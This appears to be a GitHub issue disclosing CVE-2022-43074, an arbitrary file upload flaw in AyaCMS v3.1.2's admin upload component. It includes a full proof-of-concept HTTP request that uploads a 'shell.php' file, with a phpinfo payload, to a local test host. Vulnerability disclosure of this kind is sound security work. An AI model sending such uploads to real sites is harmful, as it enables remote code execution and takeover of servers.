Headline
CVE-2022-43074: AnyaCMS v3.1.2 has an Arbitrary File Upload Vulnerability · Issue #3 · loadream/AyaCMS
AyaCMS v3.1.2 was discovered to contain an arbitrary file upload vulnerability via the component /admin/fst_upload.inc.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.
Vulnerable path /aya/module/admin/fst_upload.inc.php
Lines 11-15 of the “fst.upload.inc.php” file do not judge the uploaded file name suffix and file content, so arbitrary files can be uploaded, resulting in arbitrary code execution vulnerabilities
Vulnerability exploitation process:
POST /admin.php?action=fst_upload&file= HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------19139953963909426187499573422
Content-Length: 253
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/admin.php?action=fst
Cookie: PHPSESSID=df5df4jinm0nvp4vfkm6t3fjr1; amsg=; aclass=; aya_template=pc; aya_auth=V2UQGA8%2BEiJCfV87V2ZTVl9vDD4MOEckT3cEahZ4UmpAIRYmCz0CMlA3XWdBJ0IoW24AMQtuVDVXPgM5BGJba1cxECkPOxJ%2BQiVfYFcxU24
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------19139953963909426187499573422
Content-Disposition: form-data; name="upfile"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
-----------------------------19139953963909426187499573422--